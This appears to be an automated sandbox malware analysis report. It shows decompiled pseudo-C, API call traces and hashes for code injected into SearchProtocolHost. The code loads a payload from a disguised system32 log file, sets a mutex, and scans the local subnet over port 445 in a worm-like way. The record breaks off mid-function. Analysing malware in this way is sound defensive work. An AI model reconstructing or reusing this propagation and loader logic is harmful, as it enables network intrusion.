                                                0x02fa4a32
                                                0x02fa4a38
                                                0x02fa4a3b
                                                0x02fa4a3f
                                                0x02fa4a51
                                                0x02fa4a54
                                                0x02fa4a56
                                                0x02fa4a5e
                                                0x02fa4a60
                                                0x02fa4a65
                                                0x02fa4a71
                                                0x02fa4a77
                                                0x02fa4a7c
                                                0x00000000
                                                0x00000000
                                                0x02fa4a7e
                                                0x02fa4a80
                                                0x02fa4a82
                                                0x02fa4a87
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fa4a87
                                                0x02fa4a89
                                                0x02fa4a89
                                                0x02fa4a8c
                                                0x02fa4a8f
                                                0x02fa4aab
                                                0x02fa4ab9
                                                0x02fa4a91
                                                0x02fa4a91
                                                0x02fa4a9c
                                                0x02fa4aaa
                                                0x02fa4aaa
                                                0x02fa4a41
                                                0x02fa4a42
                                                0x00000000
                                                0x02fa4a42
                                                0x02fa4a3f

                                                APIs
                                                • CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490,?,?,?,?,02FA4AE6,?), ref: 02FA4A03
                                                • GetFileSizeEx.KERNEL32(00000000,?,?,73B76490), ref: 02FA4A23
                                                • LocalAlloc.KERNELBASE(00000040,00000000,?,73B76490), ref: 02FA4A32
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02FA4A42
                                                • ReadFile.KERNELBASE(00000000,73B76490,00000000,?,00000000,?,73B76490), ref: 02FA4A71
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02FA4A91
                                                • LocalFree.KERNEL32(73B76490,?,73B76490), ref: 02FA4A9C
                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,73B76490), ref: 02FA4AAB
                                                Strings
                                                • C:\Windows\system32\msvcwme.log, xrefs: 02FA49FB
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CloseFile$HandleLocal$AllocChangeCreateFindFreeNotificationReadSize
                                                • String ID: C:\Windows\system32\msvcwme.log
                                                • API String ID: 4148216468-2357825738
                                                • Opcode ID: 0b0d3d7437a80b0a372e227bc3569d17712cc191089b1eb54cc8da082e39fcd4
                                                • Instruction ID: 5fadf911a7062ea6238e68a9ecfbe3bd086730fd89f07afd3f108b6fd72a34a8
                                                • Opcode Fuzzy Hash: 0b0d3d7437a80b0a372e227bc3569d17712cc191089b1eb54cc8da082e39fcd4
                                                • Instruction Fuzzy Hash: FC21E575E40209ABEB108FA5DC49BAEFBB8EB08791F600155FA06F7380D7B06411CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA9310 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 51synchronizationnetworkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 38%
                                                			E02FA9310() {
				signed int _v8;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v48;
				char _v444;
				void* __esi;
				signed int _t12;
				void* _t16;
				signed int _t18;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				signed int _t33;

				_t35 = (_t33 & 0xfffffff8) - 0x1bc;
				_t12 =  *0x2fcf008; // 0x93ad1eea
				_v8 = _t12 ^ (_t33 & 0xfffffff8) - 0x000001bc;
				__imp__#115(0x202,  &_v444, _t29); // executed
				asm("movaps xmm0, [0x2fccf90]");
				asm("movups [esp+0x1a8], xmm0");
				_v32 = 0x2d383132;
				_v28 = 0x44383732;
				_v24 = 0x7d454536;
				_v20 = 0;
				_t16 = CreateMutexA(0, 1,  &_v48); // executed
				_t30 = _t16;
				_t18 = GetLastError() & 0xffffff00 | _t17 == 0x000000b7;
				if(_t30 == 0) {
					L3:
					_pop(_t31);
					_t10 =  &_v16; // 0x2d383132
					return E02FB0A5D( *_t10 ^ _t35, _t31);
				} else {
					if(_t18 == 0) {
						_pop(_t32);
						return E02FB0A5D(_v16 ^ _t35, _t32);
					} else {
						ReleaseMutex(_t30);
						CloseHandle(_t30);
						goto L3;
					}
				}
			}




















                                                0x02fa9316
                                                0x02fa931c
                                                0x02fa9323
                                                0x02fa9335
                                                0x02fa933b
                                                0x02fa934e
                                                0x02fa9356
                                                0x02fa9361
                                                0x02fa936c
                                                0x02fa9377
                                                0x02fa937f
                                                0x02fa9385
                                                0x02fa9392
                                                0x02fa9397
                                                0x02fa93ab
                                                0x02fa93ad
                                                0x02fa93ae
                                                0x02fa93bf
                                                0x02fa9399
                                                0x02fa939b
                                                0x02fa93c9
                                                0x02fa93d4
                                                0x02fa939d
                                                0x02fa939e
                                                0x02fa93a5
                                                0x00000000
                                                0x02fa93a5
                                                0x02fa939b

                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 02FA9335
                                                • CreateMutexA.KERNELBASE ref: 02FA937F
                                                • GetLastError.KERNEL32 ref: 02FA9387
                                                • ReleaseMutex.KERNEL32(00000000), ref: 02FA939E
                                                • CloseHandle.KERNEL32(00000000), ref: 02FA93A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Mutex$CloseCreateErrorHandleLastReleaseStartup
                                                • String ID: 218-$278D$6EE}
                                                • API String ID: 2916891069-3960941272
                                                • Opcode ID: bce6e45142019450440d93b2a6af2e15160849543c7df81c204337b147ce181a
                                                • Instruction ID: 5ad1cc324c400ef490101338cd0918b24b771b331f430d5a7391a580ce037f22
                                                • Opcode Fuzzy Hash: bce6e45142019450440d93b2a6af2e15160849543c7df81c204337b147ce181a
                                                • Instruction Fuzzy Hash: EB11C2718883488BD7309B20E9097EAF7E8FF86750F90090DE98D9B280DB716455CBC3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA6D40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 107sleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 84%
                                                			E02FA6D40() {
				signed int _v8;
				char _v9;
				short _v11;
				char _v15;
				char _v40;
				char _v300;
				char _v560;
				signed int _t18;
				signed char _t29;
				signed int _t30;
				intOrPtr* _t31;
				void* _t35;
				signed char _t47;
				intOrPtr _t51;
				void* _t54;
				void* _t56;
				void* _t57;
				intOrPtr* _t59;
				signed int _t60;
				void* _t61;
				void* _t63;

				_t18 =  *0x2fcf008; // 0x93ad1eea
				_v8 = _t18 ^ _t60;
				_push(_t56);
				E02FB3440(_t56,  &_v300, 0, 0x104);
				E02FB3440(_t56,  &_v560, 0, 0x104);
				GetWindowsDirectoryA( &_v560, 0x104);
				_push("NetworkDistribution");
				E02FA5180( &_v300, 0x104, "%s\\%s\\",  &_v560);
				_t63 = _t61 + 0x2c;
				_t29 = E02FA6FE0(1,  &_v300, _t56); // executed
				_t57 = Sleep;
				asm("sbb bl, bl");
				_t47 =  ~_t29 &  ~_t29;
				while(1) {
					asm("xorps xmm0, xmm0");
					_v40 = 0;
					asm("movups [ebp-0x23], xmm0");
					_t59 = 0;
					_v15 = 0;
					asm("movq [ebp-0x13], xmm0");
					_v11 = 0;
					_v9 = 0;
					EnterCriticalSection(0x2fd6a5c);
					_t30 =  *0x2fd5ba0;
					if(_t30 != 0) {
						_t49 =  *0x2fd5b9c;
						_t38 = _t30 - 1;
						_t59 =  *((intOrPtr*)( *0x2fd5b9c));
						 *0x2fd5ba0 = _t30 - 1;
						E02FB1920( *0x2fd5b9c, _t49 + 4, _t38 << 2);
						_t63 = _t63 + 0xc;
						E02FA6EF0(0x2fd5b80);
					}
					L3:
					LeaveCriticalSection(0x2fd6a5c);
					if(_t59 == 0) {
						Sleep(0x64);
						continue;
						do {
							while(1) {
								asm("xorps xmm0, xmm0");
								_v40 = 0;
								asm("movups [ebp-0x23], xmm0");
								_t59 = 0;
								_v15 = 0;
								asm("movq [ebp-0x13], xmm0");
								_v11 = 0;
								_v9 = 0;
								EnterCriticalSection(0x2fd6a5c);
								_t30 =  *0x2fd5ba0;
								if(_t30 != 0) {
									_t49 =  *0x2fd5b9c;
									_t38 = _t30 - 1;
									_t59 =  *((intOrPtr*)( *0x2fd5b9c));
									 *0x2fd5ba0 = _t30 - 1;
									E02FB1920( *0x2fd5b9c, _t49 + 4, _t38 << 2);
									_t63 = _t63 + 0xc;
									E02FA6EF0(0x2fd5b80);
								}
								goto L3;
							}
							L9:
							_t35 = E02FA7720(_t47,  &_v40,  &_v300, _t57, _t59, _t70);
							_t71 = _t35;
						} while (_t35 != 0);
						L10:
						if(E02FAB070( &_v40, _t71) == 0) {
							Sleep(0xa);
						}
						continue;
					}
					_t31 = _t59;
					_t13 = _t31 + 1; // 0x1
					_t54 = _t13;
					do {
						_t51 =  *_t31;
						_t31 = _t31 + 1;
					} while (_t51 != 0);
					if(_t31 - _t54 > 4) {
						E02FB5C70( &_v40, 0x20, _t59);
						_t63 = _t63 + 0xc;
					}
					_push(0x2c);
					E02FB0AA1(_t59);
					_t63 = _t63 + 8;
					_t70 = _t47;
					if(_t47 == 0) {
						goto L10;
					} else {
						goto L9;
					}
				}
			}
























                                                0x02fa6d49
                                                0x02fa6d50
                                                0x02fa6d55
                                                0x02fa6d66
                                                0x02fa6d79
                                                0x02fa6d8d
                                                0x02fa6d93
                                                0x02fa6db0
                                                0x02fa6db5
                                                0x02fa6dbe
                                                0x02fa6dc3
                                                0x02fa6dcd
                                                0x02fa6dcf
                                                0x02fa6dd1
                                                0x02fa6dd1
                                                0x02fa6dd4
                                                0x02fa6ddd
                                                0x02fa6de1
                                                0x02fa6de3
                                                0x02fa6dea
                                                0x02fa6def
                                                0x02fa6df5
                                                0x02fa6df9
                                                0x02fa6dff
                                                0x02fa6e06
                                                0x02fa6e08
                                                0x02fa6e0e
                                                0x02fa6e0f
                                                0x02fa6e11
                                                0x02fa6e1f
                                                0x02fa6e24
                                                0x02fa6e2c
                                                0x02fa6e2c
                                                0x02fa6e31
                                                0x02fa6e36
                                                0x02fa6e3e
                                                0x02fa6ea2
                                                0x02fa6ea4
                                                0x02fa6dd1
                                                0x02fa6dd1
                                                0x02fa6dd1
                                                0x02fa6dd4
                                                0x02fa6ddd
                                                0x02fa6de1
                                                0x02fa6de3
                                                0x02fa6dea
                                                0x02fa6def
                                                0x02fa6df5
                                                0x02fa6df9
                                                0x02fa6dff
                                                0x02fa6e06
                                                0x02fa6e08
                                                0x02fa6e0e
                                                0x02fa6e0f
                                                0x02fa6e11
                                                0x02fa6e1f
                                                0x02fa6e24
                                                0x02fa6e2c
                                                0x02fa6e2c
                                                0x00000000
                                                0x02fa6e06
                                                0x02fa6e71
                                                0x02fa6e7a
                                                0x02fa6e7f
                                                0x02fa6e7f
                                                0x02fa6e87
                                                0x02fa6e91
                                                0x02fa6e99
                                                0x02fa6e99
                                                0x00000000
                                                0x02fa6e91
                                                0x02fa6e40
                                                0x02fa6e42
                                                0x02fa6e42
                                                0x02fa6e45
                                                0x02fa6e45
                                                0x02fa6e47
                                                0x02fa6e48
                                                0x02fa6e51
                                                0x02fa6e5a
                                                0x02fa6e5f
                                                0x02fa6e5f
                                                0x02fa6e62
                                                0x02fa6e65
                                                0x02fa6e6a
                                                0x02fa6e6d
                                                0x02fa6e6f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fa6e6f

                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 02FA6D8D
                                                  • Part of subcall function 02FA6FE0: CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02FA703C
                                                  • Part of subcall function 02FA6FE0: FindCloseChangeNotification.KERNELBASE(00000000), ref: 02FA704C
                                                  • Part of subcall function 02FA6FE0: CreateDirectoryA.KERNELBASE(?,00000000), ref: 02FA7055
                                                  • Part of subcall function 02FA6FE0: DeleteFileA.KERNEL32(?), ref: 02FA7093
                                                • EnterCriticalSection.KERNEL32(02FD6A5C), ref: 02FA6DF9
                                                • LeaveCriticalSection.KERNEL32(02FD6A5C), ref: 02FA6E36
                                                • Sleep.KERNEL32(0000000A), ref: 02FA6E99
                                                • Sleep.KERNEL32(00000064), ref: 02FA6EA2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CreateCriticalDirectoryFileSectionSleep$ChangeCloseDeleteEnterFindLeaveNotificationWindows
                                                • String ID: %s\%s\$NetworkDistribution
                                                • API String ID: 2690460970-574155335
                                                • Opcode ID: b49a616d41f81b74d9239b0805e22bd4a07c01e529d949909593e1ddb2542975
                                                • Instruction ID: 5ede488a9d2bfbf22a2898e08afac7482df4f0c768cb9026d2da484213193be2
                                                • Opcode Fuzzy Hash: b49a616d41f81b74d9239b0805e22bd4a07c01e529d949909593e1ddb2542975
                                                • Instruction Fuzzy Hash: CB31F7B1D81218AAEB10EBB0DC55FDEB369AF057C4F544054E745F7140EB71A6448B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA4AC0 Relevance: 12.1, APIs: 8, Instructions: 148COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 82%
                                                			E02FA4AC0(void* __ecx, intOrPtr __edx, void** _a4, long* _a8) {
				void* _v8;
				long _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				void* __edi;
				void* __esi;
				void* _t44;
				intOrPtr* _t47;
				long _t51;
				void* _t52;
				long _t61;
				long _t62;
				void* _t63;
				long _t66;
				void* _t78;
				void* _t79;
				long* _t80;
				long _t87;
				intOrPtr _t89;
				intOrPtr* _t90;
				void* _t92;
				void* _t93;

				_v24 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t44 = E02FA49E0( &_v8,  &_v12); // executed
				_t93 = _t92 + 4;
				if(_t44 != 0) {
					_t87 = _v12;
					_t78 = 0;
					_v16 = 0;
					__eflags = _t87;
					if(__eflags <= 0) {
						L10:
						LocalFree(_v8); // executed
						return _v16;
					} else {
						while(1) {
							_t47 = E02FB0A6E(_t90, __eflags, 0x58); // executed
							_t90 = _t47;
							_v20 = _t90;
							_v20 = _t90;
							E02FB3440(_t87, _t90, 0, 0x58);
							_t93 = _t93 + 0x10;
							asm("movups xmm0, [ebx+eax]");
							asm("movups [esi], xmm0");
							asm("movups xmm0, [ebx+eax+0x10]");
							asm("movups [esi+0x10], xmm0");
							asm("movups xmm0, [ebx+eax+0x20]");
							asm("movups [esi+0x20], xmm0");
							asm("movups xmm0, [ebx+eax+0x30]");
							asm("movups [esi+0x30], xmm0");
							asm("movups xmm0, [ebx+eax+0x40]");
							_t79 = _t78 + 0x50;
							asm("movups [esi+0x40], xmm0");
							__eflags =  *_t90 - _v24;
							if( *_t90 == _v24) {
								break;
							}
							_t78 = _t79 +  *(_t90 + 0x38) +  *(_t90 + 0xc);
							__eflags = _t78 - _t87;
							if(__eflags < 0) {
								continue;
							} else {
								LocalFree(_v8);
								return _v16;
							}
							goto L11;
						}
						_t51 =  *(_t90 + 0xc);
						_v12 = _t51;
						_t52 = LocalAlloc(0x40, _t51); // executed
						 *(_t90 + 0x50) = _t52;
						 *((intOrPtr*)(_t90 + 0x54)) = LocalAlloc(0x40,  *(_t90 + 0x38));
						E02FC3DB0( *(_t90 + 0x50), _v8 + _t79, _v12);
						E02FC3DB0( *((intOrPtr*)(_t90 + 0x54)), _v12 + _t79 + _v8,  *(_t90 + 0x38));
						_t61 = E02FA48B0( &_v20);
						__eflags = _t61;
						if(_t61 == 0) {
							goto L10;
						} else {
							_t89 = _v20;
							_t80 = _a8;
							_t62 =  *(_t89 + 8);
							 *_t80 = _t62; // executed
							_t63 = LocalAlloc(0x40, _t62); // executed
							 *_a4 = _t63;
							E02FB3440(_t89, _t63, 0,  *(_t89 + 8));
							_t66 = E02FA1000(_t63, _t80,  *((intOrPtr*)(_t89 + 0x50)), _v12);
							__eflags = _t66;
							if(_t66 == 0) {
								__eflags =  *_t80 -  *(_t89 + 8);
								_t69 =  ==  ? 1 : _v16 & 0x000000ff;
								_v16 =  ==  ? 1 : _v16 & 0x000000ff;
								goto L10;
							} else {
								LocalFree( *_a4);
								LocalFree(_v8);
								return _v16;
							}
						}
					}
				} else {
					return _t44;
				}
				L11:
			}


























                                                0x02fa4acb
                                                0x02fa4ad3
                                                0x02fa4ada
                                                0x02fa4ae1
                                                0x02fa4ae6
                                                0x02fa4aeb
                                                0x02fa4af4
                                                0x02fa4af7
                                                0x02fa4af9
                                                0x02fa4afd
                                                0x02fa4aff
                                                0x02fa4c42
                                                0x02fa4c45
                                                0x02fa4c54
                                                0x02fa4b05
                                                0x02fa4b05
                                                0x02fa4b07
                                                0x02fa4b0f
                                                0x02fa4b11
                                                0x02fa4b14
                                                0x02fa4b1c
                                                0x02fa4b24
                                                0x02fa4b27
                                                0x02fa4b2b
                                                0x02fa4b2e
                                                0x02fa4b33
                                                0x02fa4b37
                                                0x02fa4b3c
                                                0x02fa4b40
                                                0x02fa4b45
                                                0x02fa4b49
                                                0x02fa4b51
                                                0x02fa4b54
                                                0x02fa4b58
                                                0x02fa4b5a
                                                0x00000000
                                                0x00000000
                                                0x02fa4b62
                                                0x02fa4b64
                                                0x02fa4b66
                                                0x00000000
                                                0x02fa4b68
                                                0x02fa4b6b
                                                0x02fa4b7a
                                                0x02fa4b7a
                                                0x00000000
                                                0x02fa4b66
                                                0x02fa4b7b
                                                0x02fa4b84
                                                0x02fa4b87
                                                0x02fa4b90
                                                0x02fa4b9c
                                                0x02fa4ba8
                                                0x02fa4bbd
                                                0x02fa4bc8
                                                0x02fa4bcd
                                                0x02fa4bcf
                                                0x00000000
                                                0x02fa4bd1
                                                0x02fa4bd1
                                                0x02fa4bd4
                                                0x02fa4bd7
                                                0x02fa4bdd
                                                0x02fa4bdf
                                                0x02fa4bf0
                                                0x02fa4bf2
                                                0x02fa4c02
                                                0x02fa4c0a
                                                0x02fa4c0c
                                                0x02fa4c36
                                                0x02fa4c3c
                                                0x02fa4c3f
                                                0x00000000
                                                0x02fa4c0e
                                                0x02fa4c13
                                                0x02fa4c1c
                                                0x02fa4c2b
                                                0x02fa4c2b
                                                0x02fa4c0c
                                                0x02fa4bcf
                                                0x02fa4af3
                                                0x02fa4af3
                                                0x02fa4af3
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 02FA49E0: CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490,?,?,?,?,02FA4AE6,?), ref: 02FA4A03
                                                  • Part of subcall function 02FA49E0: GetFileSizeEx.KERNEL32(00000000,?,?,73B76490), ref: 02FA4A23
                                                  • Part of subcall function 02FA49E0: LocalAlloc.KERNELBASE(00000040,00000000,?,73B76490), ref: 02FA4A32
                                                  • Part of subcall function 02FA49E0: CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02FA4A42
                                                • new.LIBCMT ref: 02FA4B07
                                                • LocalFree.KERNEL32(00000000), ref: 02FA4B6B
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: FileLocal$AllocCloseCreateFreeHandleSize
                                                • String ID:
                                                • API String ID: 1503672127-0
                                                • Opcode ID: 3205dbfe04945cc9f4075071335e1ca5ef35dd0e3e57b1571629aff60a28955c
                                                • Instruction ID: d822e1b04bd36b3b12a9bf79f2f7126292166a3c16820afc5dc02fc33e5de8fc
                                                • Opcode Fuzzy Hash: 3205dbfe04945cc9f4075071335e1ca5ef35dd0e3e57b1571629aff60a28955c
                                                • Instruction Fuzzy Hash: D151F375D00708ABDB11DFA8DD45AEEFBB0FF48358F144594EE49A3201E771AA94CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAAFC0 Relevance: 12.1, APIs: 8, Instructions: 54sleepthreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 100%
                                                			E02FAAFC0() {
				void* __edi;
				void* _t7;
				void* _t9;
				signed int _t14;
				signed int _t15;
				void* _t18;
				void* _t19;

				Sleep(0xbb8); // executed
				_t7 = 0;
				do {
					_t1 = _t7 + L"wuauclt.exe"; // 0x750077
					_t14 =  *_t1 & 0x0000ffff;
					_t7 = _t7 + 2;
					 *(_t7 + 0x2fd6836) = _t14;
					_t22 = _t14;
				} while (_t14 != 0);
				E02FA9D90(_t22);
				_t9 = E02FAAE20(_t14, _t18, _t22);
				if(_t9 != 0) {
					while(1) {
						L4:
						EnterCriticalSection(0x2fd5bfc);
						_t15 =  *0x2fd5c18;
						if(_t15 == 0) {
							break;
						}
						_t19 =  *( *0x2fd5c14 + _t15 * 4 - 4);
						 *0x2fd5c18 = _t15 - 1;
						E02FA6EF0(0x2fd5bf8);
						if(_t19 != 0) {
							CreateThread(0, 0, E02FAAD60, _t19, 0, 0);
						}
						LeaveCriticalSection(0x2fd5bfc);
						Sleep(0x64);
					}
					LeaveCriticalSection(0x2fd5bfc);
					Sleep(0xbb8);
					Sleep(0x64);
					goto L4;
				}
				return _t9;
			}










                                                0x02faafce
                                                0x02faafd0
                                                0x02faafd2
                                                0x02faafd2
                                                0x02faafd2
                                                0x02faafd9
                                                0x02faafdc
                                                0x02faafe3
                                                0x02faafe3
                                                0x02faafe8
                                                0x02faafed
                                                0x02faaff4
                                                0x02fab000
                                                0x02fab000
                                                0x02fab005
                                                0x02fab00b
                                                0x02fab013
                                                0x00000000
                                                0x00000000
                                                0x02fab01a
                                                0x02fab01f
                                                0x02fab02a
                                                0x02fab031
                                                0x02fab041
                                                0x02fab041
                                                0x02fab04c
                                                0x02fab050
                                                0x02fab050
                                                0x02fab059
                                                0x02fab060
                                                0x02fab064
                                                0x00000000
                                                0x02fab064
                                                0x02fab06b

                                                APIs
                                                • Sleep.KERNELBASE(00000BB8), ref: 02FAAFCE
                                                • EnterCriticalSection.KERNEL32(02FD5BFC), ref: 02FAB005
                                                • CreateThread.KERNEL32(00000000,00000000,02FAAD60,?,00000000,00000000), ref: 02FAB041
                                                • LeaveCriticalSection.KERNEL32(02FD5BFC), ref: 02FAB04C
                                                • Sleep.KERNEL32(00000064), ref: 02FAB050
                                                • LeaveCriticalSection.KERNEL32(02FD5BFC), ref: 02FAB059
                                                • Sleep.KERNEL32(00000BB8), ref: 02FAB060
                                                • Sleep.KERNEL32(00000064), ref: 02FAB064
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Sleep$CriticalSection$Leave$CreateEnterThread
                                                • String ID:
                                                • API String ID: 2546236395-0
                                                • Opcode ID: 5885f4980c2cf54dee3bceaa398a83ccedf6fd8ae9546d56fb4ecf1558e187d8
                                                • Instruction ID: 2340469e68bd2a1fe92ac00d987a4d068667fd792d74a7b6ea5cc515885cd63d
                                                • Opcode Fuzzy Hash: 5885f4980c2cf54dee3bceaa398a83ccedf6fd8ae9546d56fb4ecf1558e187d8
                                                • Instruction Fuzzy Hash: 210144B1BC430C9AEA206BA4DC66F2D7762EF44FC4F580409A3069B180CBA1A480CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAB320 Relevance: 9.1, APIs: 6, Instructions: 57networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000006), ref: 02FAB33A
                                                • inet_addr.WS2_32(?), ref: 02FAB351
                                                • htons.WS2_32(000001BD), ref: 02FAB35F
                                                • connect.WS2_32(00000000,?,00000010), ref: 02FAB370
                                                • closesocket.WS2_32(00000000), ref: 02FAB37C
                                                • closesocket.WS2_32(00000000), ref: 02FAB394
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: closesocket$connecthtonsinet_addrsocket
                                                • String ID:
                                                • API String ID: 279130052-0
                                                • Opcode ID: 70aa75d4805e6738f121fc1fd1f33ae2ac18133ba646a5e316d2eacee0c09eab
                                                • Instruction ID: eaee8fd73f55f7e25853c2aff509319cf2b497980cc05f1249beaae8ec739048
                                                • Opcode Fuzzy Hash: 70aa75d4805e6738f121fc1fd1f33ae2ac18133ba646a5e316d2eacee0c09eab
                                                • Instruction Fuzzy Hash: 1F110834E4020CABCB10AFB4ED09AEEF3B8FF46360F60065AE915AB2C0DB7159118791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAB290 Relevance: 9.1, APIs: 6, Instructions: 56networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000006), ref: 02FAB2AD
                                                • inet_addr.WS2_32(?), ref: 02FAB2C4
                                                • htons.WS2_32(0000DEFC), ref: 02FAB2CE
                                                • connect.WS2_32(00000000,?,00000010), ref: 02FAB2DF
                                                • closesocket.WS2_32(00000000), ref: 02FAB2EB
                                                • closesocket.WS2_32(00000000), ref: 02FAB304
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: closesocket$connecthtonsinet_addrsocket
                                                • String ID:
                                                • API String ID: 279130052-0
                                                • Opcode ID: 03e82904dad8b8fd3d9cb903762ee8104f5b15c9f2f916f053165ecf6cc59039
                                                • Instruction ID: 8e39eac73202a1dd82d6523187023862cfd91df38c31a210dceaab573311ea7e
                                                • Opcode Fuzzy Hash: 03e82904dad8b8fd3d9cb903762ee8104f5b15c9f2f916f053165ecf6cc59039
                                                • Instruction Fuzzy Hash: 50010831E4020CABCB10AFB9A949AEEF3F8FF49361F50066AE915A7280DA3159108790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA7C20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121sleepnetworkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 483 2fa7c20-2fa7c4d 484 2fa7c53-2fa7c8c call 2fb3440 gethostname gethostbyname 483->484 487 2fa7c8e-2fa7c95 Sleep 484->487 488 2fa7c97-2fa7cb4 484->488 487->484 489 2fa7cba-2fa7cbc 488->489 490 2fa7ddf-2fa7de6 Sleep 488->490 491 2fa7cc0-2fa7d16 call 2fa5180 489->491 490->484 494 2fa7d18-2fa7d1a 491->494 495 2fa7d1c-2fa7d1f 491->495 496 2fa7d2b-2fa7d64 call 2fa5a00 call 2fa7df0 494->496 497 2fa7d22-2fa7d27 495->497 503 2fa7d73-2fa7d98 call 2fab4e0 496->503 504 2fa7d66-2fa7d6e call 2fa5cf0 496->504 497->497 498 2fa7d29 497->498 498->496 507 2fa7d9d-2fa7dac 503->507 504->503 508 2fa7dd9 507->508 509 2fa7dae-2fa7dd3 507->509 508->490 509->491 509->508
                                                C-Code - Quality: 63%
                                                			E02FA7C20() {
				char _v8;
				char _v16;
				signed int _v20;
				char _v21;
				short _v23;
				char _v27;
				char _v52;
				char _v308;
				intOrPtr _v312;
				char _v316;
				char _v332;
				signed int _v336;
				signed int _t43;
				signed int _t44;
				intOrPtr* _t50;
				signed char* _t52;
				signed int _t53;
				intOrPtr* _t56;
				void* _t57;
				intOrPtr* _t61;
				signed int _t67;
				signed char* _t68;
				void* _t71;
				intOrPtr _t73;
				signed char** _t77;
				signed int _t78;
				void* _t81;
				signed int _t82;
				intOrPtr* _t84;
				signed int _t85;
				void* _t86;
				void* _t87;
				void* _t88;

				_push(0xffffffff);
				_push(E02FC467B);
				_push( *[fs:0x0]);
				_t87 = _t86 - 0x140;
				_t43 =  *0x2fcf008; // 0x93ad1eea
				_t44 = _t43 ^ _t85;
				_v20 = _t44;
				_push(_t44);
				 *[fs:0x0] =  &_v16;
				_t81 = Sleep;
				while(1) {
					L1:
					E02FB3440(_t81,  &_v308, 0, 0x100);
					_t87 = _t87 + 0xc;
					gethostname( &_v308, 0x100); // executed
					_t50 =  &_v308;
					__imp__#52(_t50); // executed
					_t84 = _t50;
					if(_t84 == 0) {
						break;
					}
					_v336 = 0;
					_t52 =  *( *(_t84 + 0xc));
					_t72 =  *_t52 & 0x000000ff;
					_t78 = _t52[1] & 0x000000ff;
					_t53 = _t52[2] & 0x000000ff;
					if(( *_t52 & 0x000000ff) == 0x7f) {
						L15:
						Sleep(0xdbba0); // executed
						continue;
					}
					_t82 = 0;
					do {
						_push(_t53);
						_push(_t78);
